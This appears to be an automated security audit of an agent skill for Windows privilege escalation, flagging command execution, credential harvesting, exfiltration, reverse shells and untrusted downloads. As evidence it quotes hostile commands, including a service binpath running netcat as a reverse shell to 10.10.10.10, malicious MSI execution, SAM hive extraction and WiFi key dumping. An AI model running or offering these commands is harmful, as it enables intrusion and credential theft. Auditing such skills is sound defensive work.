Windows Privilege Escalation
Warn
Audited by Gen Agent Trust Hub on Mar 4, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONCREDENTIALS_UNSAFEDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill provides numerous commands to manipulate system services and execute code with SYSTEM privileges. Evidence includes:
- Modifying service binary paths to execute arbitrary shells:
sc config <service> binpath= "C:\nc.exe -e cmd.exe 10.10.10.10 4444". - Executing malicious MSI installers via
msiexec /i C:\evil.msi, which run in the context of the installer service (SYSTEM). - Utilizing token impersonation tools like
JuicyPotato.exe,PrintSpoofer.exe, andGodPotato.exeto elevate from service accounts to SYSTEM. - [CREDENTIALS_UNSAFE]: The skill documents extensive methods for harvesting credentials from sensitive locations:
- Accessing the SAM and SYSTEM hives to extract user hashes:
%SYSTEMROOT%\System32\config\SAM. - Querying the registry for plaintext passwords in
Winlogon(autologin), PuTTY sessions, and VNC configurations. - Searching for cleartext credentials in
unattend.xml,sysprep.inf, and PowerShell history files. - Extracting WiFi passwords using
netsh wlan show profile <SSID> key=clear. - [DATA_EXFILTRATION]: Provides instructions for copying and extracting local security databases (SAM/SYSTEM) which contain the machine's password hashes. It also details searching the entire filesystem for files containing 'pass' or 'cred' in their names.
- [REMOTE_CODE_EXECUTION]: Facilitates the establishment of reverse shells to external IP addresses (e.g.,
10.10.10.10) usingnc.exeandmsfvenomgenerated payloads. - [EXTERNAL_DOWNLOADS]: Encourages the download and execution of multiple third-party exploitation tools (WinPEAS, Seatbelt, JuicyPotato, etc.) without specifying trusted sources or verifying integrity.
Audit Metadata